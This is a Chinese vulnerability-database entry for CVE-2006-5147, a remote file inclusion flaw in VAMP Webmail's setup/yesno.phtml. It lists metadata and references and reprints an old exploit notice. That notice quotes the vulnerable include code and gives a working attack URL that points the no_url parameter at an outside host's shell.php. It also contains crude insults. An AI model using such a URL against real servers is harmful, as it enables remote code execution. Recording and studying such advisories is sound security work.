VAMP Webmail 'wamp_dir/setup/yesno.phtml'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111177 漏洞类型 输入验证
发布时间 2006-09-30 更新时间 2006-10-05
CVE编号 CVE-2006-5147 CNNVD-ID CNNVD-200610-063
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2461
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-063
|漏洞详情
VAMPWebmail2.0beta1及更早版本的wamp_dir/setup/yesno.phtml中存在PHP远程文件包含漏洞。远程攻击者通过no_url参数中的URL执行任意PHP代码。
|漏洞EXP
###### ToXiC #########################
#
#VAMP Webmail Remote File Inclusion by ToXiC CreW
#
#BuG FounD by Drago84
#
#Application Affect:VAMP Webmail
#
#Page:
#     yesno.phtml
#Dir :
#     /setup/
#
#Problem:
#        <?if($answer=="Yes") {
#         include $yes_url;
#         } else {
#        include $no_url;
#         }?>
# ExPloit :
#http://www.site.com/wamp_dir/setup/yesno.phtml?no_url=http://sonic-banda-di-lamer.gay/shell.php?
#
#        
GrEatZ All Member of ToXiC, Str0ke
#
#
#FUCK #Sonic
#
# ToXic Security Italian CreW
###### ToXiC ##########

# milw0rm.com [2006-09-30]
|参考资料

来源:XF
名称:vampwebmail-yesno-file-include(29288)
链接:http://xforce.iss.net/xforce/xfdb/29288
来源:BID
名称:20289
链接:http://www.securityfocus.com/bid/20289
来源:MILW0RM
名称:2461
链接:http://www.milw0rm.com/exploits/2461
来源:MILW0RM
名称:2461
链接:http://milw0rm.com/exploits/2461